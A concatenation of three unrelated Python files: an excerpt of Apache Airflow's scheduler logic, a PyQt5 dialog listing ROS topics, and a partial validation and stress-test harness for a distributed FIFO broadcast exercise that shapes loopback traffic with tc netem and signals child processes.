.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None))) # pylint: disable=no-member
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state}, synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states: frozenset, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: Dict[str, int] = defaultdict(int)
task_map: Dict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
# pylint: disable=too-many-locals,too-many-statements
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:return: list[airflow.models.TaskInstance]
"""
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
task_instances_to_examine = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR, and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id.is_(None), not_(DR.run_id.like(f"{DagRunType.BACKFILL_JOB.value}__%"))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id.is_(None), not_(DM.is_paused)))
.filter(TI.state == State.SCHEDULED)
.all()
)
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=list(EXECUTION_STATES), session=session)
num_tasks_in_executor = 0
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
# pylint: disable=too-many-nested-blocks
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
num_starving_tasks_total += num_starving_tasks
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:rtype: list[airflow.models.taskinstance.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
tis_to_set_to_queued = (
session
.query(TI)
.filter(TI.filter_for_tis(task_instances))
.filter(TI.state == State.SCHEDULED)
.with_for_update()
.all()
)
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_queued)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow()}, synchronize_session=False
)
session.commit()
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in tis_to_set_to_queued]
task_instance_str = "\n\t".join([repr(x) for x in tis_to_set_to_queued])
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session=None):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1, # pylint: disable=protected-access
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to queued state
filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
session.query(TI).filter(filter_for_tis).update(
{TI.state: State.SCHEDULED, TI.queued_dttm: None}, synchronize_session=False
)
for task_instance in tis_to_set_to_scheduled:
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
# pylint: disable=too-many-nested-blocks
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state in (State.FAILED, State.SUCCESS):
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(
"Executor reports task instance %s finished (%s) although the task says its %s. "
"Was the task killed externally?",
ti, state, ti.state
)
simple_dag = simple_dag_bag.get_dag(dag_id)
self.processor_agent.send_callback_to_execute(
full_filepath=simple_dag.full_filepath,
task_instance=ti,
msg="Executor reports task instance finished ({}) although the task says its {}. "
"Was the task killed externally?".format(state, ti.state)
)
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor_class not in (
ExecutorLoader.LOCAL_EXECUTOR, ExecutorLoader.SEQUENTIAL_EXECUTOR, ExecutorLoader.DASK_EXECUTOR
):
pickle_dags = True
self.log.info("Processing each file at most %s times", self.num_runs)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
self.num_runs,
type(self)._create_dag_file_processor,
processor_timeout,
self.dag_ids,
pickle_dags,
async_mode)
try:
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
self.register_exit_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(file_path, failure_callback_requests, dag_ids, pickle_dags):
"""
Creates DagFileProcessorProcess instance.
"""
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_id_white_list=dag_ids,
failure_callback_requests=failure_callback_requests
)
def _run_scheduler_loop(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
# For the execute duration, parse and schedule DAGs
while True:
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
simple_dags = self.processor_agent.harvest_simple_dags()
self.log.debug("Harvested %d SimpleDAGs", len(simple_dags))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
self._emit_pool_metrics()
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug("Ran scheduling loop in %.2f seconds", loop_duration)
if not is_unit_test:
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files have been processed %d times",
self.num_runs)
break
def _validate_and_run_task_instances(self, simple_dag_bag: SimpleDagBag) -> bool:
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e: # pylint: disable=broad-except
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag)
@provide_session
def _emit_pool_metrics(self, session=None) -> None:
pools = models.Pool.slots_stats(session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
rostopic_names_test.py
|
#!/usr/bin/env python3
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEngineSettings
import os
# from PyQt5.QtDataVisualization import (Q3DSurface, Q3DScatter, Q3DTheme, QAbstract3DGraph,
# QHeightMapSurfaceDataProxy, QSurface3DSeries, QSurfaceDataItem,
# QSurfaceDataProxy, QValue3DAxis, QScatter3DSeries, QAbstract3DSeries, QScatterDataItem,QLogValue3DAxisFormatter)
from appv3 import *
import threading
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(600, 480)
self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout.setContentsMargins(11, 11, 11, 11)
self.verticalLayout.setSpacing(6)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(Dialog)
self.label.setMaximumSize(QtCore.QSize(16777215, 40))
font = QtGui.QFont()
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setSpacing(6)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setSpacing(6)
self.horizontalLayout.setObjectName("horizontalLayout")
self.label_2 = QtWidgets.QLabel(Dialog)
self.label_2.setMinimumSize(QtCore.QSize(0, 0))
self.label_2.setMaximumSize(QtCore.QSize(16777215, 40))
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.label_2.setFont(font)
self.label_2.setObjectName("label_2")
self.horizontalLayout.addWidget(self.label_2)
self.comboBox = QtWidgets.QComboBox(Dialog)
self.comboBox.setMaximumSize(QtCore.QSize(88888, 16777215))
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
self.comboBox.setFont(font)
self.comboBox.setObjectName("comboBox")
self.comboBox.addItem("")
self.comboBox.addItem("")
self.comboBox.addItem("")
self.horizontalLayout.addWidget(self.comboBox)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.label_3 = QtWidgets.QLabel(Dialog)
font = QtGui.QFont()
font.setPointSize(9)
font.setBold(True)
font.setWeight(75)
self.label_3.setFont(font)
self.label_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_3.setObjectName("label_3")
self.verticalLayout_2.addWidget(self.label_3)
self.listWidget = QtWidgets.QListWidget(Dialog)
self.listWidget.setFlow(QtWidgets.QListView.TopToBottom)
self.listWidget.setProperty("isWrapping", True)
self.listWidget.setLayoutMode(QtWidgets.QListWidget.SinglePass)
self.listWidget.setObjectName("listView")
# item = QtWidgets.QListWidgetItem()
# icon = QtGui.QIcon()
# icon.addPixmap(QtGui.QPixmap("ground_foreground.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
# item.setIcon(icon)
# self.listWidget.addItem(item)
self.verticalLayout_2.addWidget(self.listWidget)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setSpacing(6)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.button_start = QtWidgets.QPushButton(Dialog)
self.button_start.setObjectName("button_start")
self.button_start.clicked.connect(self.startWindow)
self.horizontalLayout_2.addWidget(self.button_start)
self.button_load = QtWidgets.QPushButton(Dialog)
self.button_load.setObjectName("button_load")
self.horizontalLayout_2.addWidget(self.button_load)
self.button_cancel = QtWidgets.QPushButton(Dialog)
self.button_cancel.setObjectName("button_cancel")
self.button_cancel.clicked.connect(QtCore.QCoreApplication.instance().quit)
self.horizontalLayout_2.addWidget(self.button_cancel)
self.verticalLayout_2.addLayout(self.horizontalLayout_2)
self.verticalLayout.addLayout(self.verticalLayout_2)
self.comboBox.currentTextChanged.connect(self.on_combobox_changed)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
self.x = 0
def startWindow(self):
print('a window should start')
self.MainWindow = QtWidgets.QMainWindow()
self.ui = Ui_MainWindow()
self.ui.setupUi(self.MainWindow)
self.MainWindow.show()
Dialog.close()
def on_combobox_changed(self, value):
# print(os.path.dirname(__file__))
self.listWidget.clear()
self.x = 0
# if (value == 'None'):
# import random_keyStrokes
if (value == 'Physical'):
from rostopic_names import final_list
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(os.path.dirname(__file__) + "/Physical2.jpg"), QtGui.QIcon.Normal,
QtGui.QIcon.Off)
for list_itm in final_list:
item = QtWidgets.QListWidgetItem()
font = QtGui.QFont()
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
item.setIcon(icon)
self.listWidget.addItem(item)
self.listWidget.setIconSize(QtCore.QSize(50, 50))
_translate = QtCore.QCoreApplication.translate
item = self.listWidget.item(self.x)
item.setText(_translate("Dialog", list_itm))
self.x += 1
# rospy.init_node('talker', anonymous=True)
# t = threading.Thread(target=talker)
# t.start()
if (value == 'Simulation'):
from rostopic_names import final_list
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(os.path.dirname(__file__) + "/Simulation2.jpg"), QtGui.QIcon.Normal,
QtGui.QIcon.Off)
for list_itm in final_list:
item = QtWidgets.QListWidgetItem()
font = QtGui.QFont()
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
item.setIcon(icon)
self.listWidget.addItem(item)
self.listWidget.setIconSize(QtCore.QSize(50, 50))
_translate = QtCore.QCoreApplication.translate
item = self.listWidget.item(self.x)
item.setText(_translate("Dialog", list_itm))
self.x += 1
# print(value)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.label.setText(_translate("Dialog", "Hello and welcome to MSSR application!"))
self.label_2.setText(_translate("Dialog", "Please choose the next session type"))
self.comboBox.setItemText(0, _translate("Dialog", "None"))
self.comboBox.setItemText(1, _translate("Dialog", "Simulation"))
self.comboBox.setItemText(2, _translate("Dialog", "Physical"))
self.label_3.setText(_translate("Dialog", "Connected to / Is active:"))
self.button_start.setText(_translate("Dialog", "Start"))
self.button_load.setText(_translate("Dialog", "Load"))
self.button_cancel.setText(_translate("Dialog", "Cancel"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Dialog = QtWidgets.QDialog()
ui = Ui_Dialog()
ui.setupUi(Dialog)
Dialog.show()
sys.exit(app.exec_())
|
validate.py
|
#!/usr/bin/env python3
import argparse
import os
import atexit
import textwrap
import time
import tempfile
import threading
import subprocess
import barrier
import finishedSignal
import signal
import random
import time
from enum import Enum
from collections import defaultdict, OrderedDict
BARRIER_IP = 'localhost'
BARRIER_PORT = 10000
SIGNAL_IP = 'localhost'
SIGNAL_PORT = 11000
PROCESSES_BASE_IP = 11000
# Do not run multiple validations concurrently!
class TC:
def __init__(self, losses, interface="lo", needSudo=True, sudoPassword="dcl"):
self.losses = losses
self.interface = interface
self.needSudo = needSudo
self.sudoPassword = sudoPassword
cmd1 = 'tc qdisc add dev {} root netem 2>/dev/null'.format(
self.interface)
cmd2 = 'tc qdisc change dev {} root netem delay {} {} distribution normal loss {} {} reorder {} {}'.format(
self.interface, *self.losses['delay'], *self.losses['loss'], *self.losses['reordering'])
if self.needSudo:
os.system("echo {} | sudo -S {}".format(self.sudoPassword, cmd1))
os.system("echo {} | sudo -S {}".format(self.sudoPassword, cmd2))
else:
os.system(cmd1)
os.system(cmd2)
atexit.register(self.cleanup)
def __str__(self):
ret = """\
Interface: {}
Distribution: Normal
Delay: {} {}
Loss: {} {}
Reordering: {} {}""".format(
self.interface,
*self.losses['delay'],
*self.losses['loss'],
*self.losses['reordering'])
return textwrap.dedent(ret)
def cleanup(self):
cmd = 'tc qdisc del dev {} root 2>/dev/null'.format(self.interface)
if self.needSudo:
os.system("echo '{}' | sudo -S {}".format(self.sudoPassword, cmd))
else:
os.system(cmd)
class ProcessState(Enum):
RUNNING = 1
STOPPED = 2
TERMINATED = 3
class ProcessInfo:
def __init__(self, handle):
self.lock = threading.Lock()
self.handle = handle
self.state = ProcessState.RUNNING
@staticmethod
def stateToSignal(state):
if state == ProcessState.RUNNING:
return signal.SIGCONT
if state == ProcessState.STOPPED:
return signal.SIGSTOP
if state == ProcessState.TERMINATED:
return signal.SIGTERM
@staticmethod
def stateToSignalStr(state):
if state == ProcessState.RUNNING:
return "SIGCONT"
if state == ProcessState.STOPPED:
return "SIGSTOP"
if state == ProcessState.TERMINATED:
return "SIGTERM"
@staticmethod
def validStateTransition(current, desired):
if current == ProcessState.TERMINATED:
return False
if current == ProcessState.RUNNING:
return desired == ProcessState.STOPPED or desired == ProcessState.TERMINATED
if current == ProcessState.STOPPED:
return desired == ProcessState.RUNNING
return False
class AtomicSaturatedCounter:
def __init__(self, saturation, initial=0):
self._saturation = saturation
self._value = initial
self._lock = threading.Lock()
def reserve(self):
with self._lock:
if self._value < self._saturation:
self._value += 1
return True
else:
return False
class Validation:
def __init__(self, processes, messages, outputDir):
self.processes = processes
self.messages = messages
self.outputDirPath = os.path.abspath(outputDir)
if not os.path.isdir(self.outputDirPath):
raise Exception(
"`{}` is not a directory".format(self.outputDirPath))
def generateConfig(self):
# Implement on the derived classes
pass
def checkProcess(self, pid):
# Implement on the derived classes
pass
def checkAll(self, continueOnError=True):
ok = True
for pid in range(1, self.processes+1):
ret = self.checkProcess(pid)
if not ret:
ok = False
if not ret and not continueOnError:
return False
return ok
class FifoBroadcastValidation(Validation):
def generateConfig(self):
hosts = tempfile.NamedTemporaryFile(mode='w')
config = tempfile.NamedTemporaryFile(mode='w')
for i in range(1, self.processes + 1):
hosts.write("{} localhost {}\n".format(i, PROCESSES_BASE_IP+i))
hosts.flush()
config.write("{}\n".format(self.messages))
config.flush()
return (hosts, config)
def checkProcess(self, pid):
filePath = os.path.join(
self.outputDirPath, 'proc{:02d}.output'.format(pid))
i = 1
nextMessage = defaultdict(lambda: 1)
filename = os.path.basename(filePath)
with open(filePath) as f:
for lineNumber, line in enumerate(f):
tokens = line.split()
# Check broadcast
if tokens[0] == 'b':
msg = int(tokens[1])
if msg != i:
print("File {}, Line {}: Messages broadcast out of order. Expected message {} but broadcast message {}".format(
filename, lineNumber, i, msg))
return False
i += 1
# Check delivery
if tokens[0] == 'd':
sender = int(tokens[1])
msg = int(tokens[2])
if msg != nextMessage[sender]:
print("File {}, Line {}: Message delivered out of order. Expected message {}, but delivered message {}".format(
filename, lineNumber, nextMessage[sender], msg))
return False
else:
nextMessage[sender] = msg + 1
return True
class LCausalBroadcastValidation(Validation):
def __init__(self, processes, outputDir, causalRelationships):
super().__init__(processes, outputDir)
def generateConfig(self):
raise NotImplementedError()
def checkProcess(self, pid):
raise NotImplementedError()
class StressTest:
def __init__(self, procs, concurrency, attempts, attemptsRatio):
self.processes = len(procs)
self.processesInfo = dict()
for (logicalPID, handle) in procs:
self.processesInfo[logicalPID] = ProcessInfo(handle)
self.concurrency = concurrency
self.attempts = attempts
self.attemptsRatio = attemptsRatio
maxTerminatedProcesses = self.processes // 2 if self.processes % 2 == 1 else (
self.processes - 1) // 2
self.terminatedProcs = AtomicSaturatedCounter(maxTerminatedProcesses)
def stress(self):
selectProc = list(range(1, self.processes+1))
random.shuffle(selectProc)
selectOp = [ProcessState.STOPPED] * int(1000 * self.attemptsRatio['STOP']) + \
[ProcessState.RUNNING] * int(1000 * self.attemptsRatio['CONT']) + \
[ProcessState.TERMINATED] * \
int(1000 * self.attemptsRatio['TERM'])
random.shuffle(selectOp)
successfulAttempts = 0
while successfulAttempts < self.attempts:
proc = random.choice(selectProc)
op = random.choice(selectOp)
info = self.processesInfo[proc]
with info.lock:
if ProcessInfo.validStateTransition(info.state, op):
if op == ProcessState.TERMINATED:
reserved = self.terminatedProcs.reserve()
if reserved:
selectProc.remove(proc)
else:
continue
time.sleep(float(random.randint(50, 500)) / 1000.0)
info.handle.send_signal(ProcessInfo.stateToSignal(op))
info.state = op
successfulAttempts += 1
print("Sending {} to process {}".format(
ProcessInfo.stateToSignalStr(op), proc))
# if op == ProcessState.TERMINATED and proc not in terminatedProcs:
# if len(terminatedProcs) < maxTerminatedProcesses:
# terminatedProcs.add(proc)
# if len(terminatedProcs) == maxTerminatedProcesses:
# break
def remainingUnterminatedProcesses(self):
remaining = []
for pid, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
remaining.append(pid)
return None if len(remaining) == 0 else remaining
def terminateAllProcesses(self):
for _, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
if info.state == ProcessState.STOPPED:
